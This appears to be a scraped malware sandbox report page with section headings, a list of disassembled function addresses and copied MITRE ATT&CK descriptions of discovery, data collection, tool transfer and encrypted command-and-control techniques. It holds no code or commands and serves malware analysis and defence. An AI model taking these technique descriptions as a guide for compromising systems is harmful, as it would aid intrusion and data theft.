Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

Function 0040C1B2, Relevance: 36.5, Strings: 29, Instructions: 218
COMMON

Function 0040AC0A, Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406
filestringCOMMON

Function 0040A6C8, Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404
COMMON

Function 0040562F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151
networkCOMMON

Function 0040CC54, Relevance: 6.0, APIs: 4, Instructions: 49
encryptionmemoryCOMMON

Function 0040CAFC, Relevance: 4.5, APIs: 3, Instructions: 46
memoryencryptionCOMMON

Function 00401085, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Function 0040B67E, Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219
libraryCOMMON

Function 0040A0D8, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160
registrystringCOMMON

Function 00413435, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 188
registrystringCOMMON

Function 0040E703, Relevance: 25.6, APIs: 1, Strings: 16, Instructions: 121
COMMON

Function 00411136, Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 278
fileCOMMON

Function 0040C118, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56
registrystringCOMMON

Function 0040C4A8, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371
fileCOMMON

Function 0041290F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138
comCOMMON

Function 0040B559, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54
libraryCOMMON

Function 00402CEC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107
stringCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre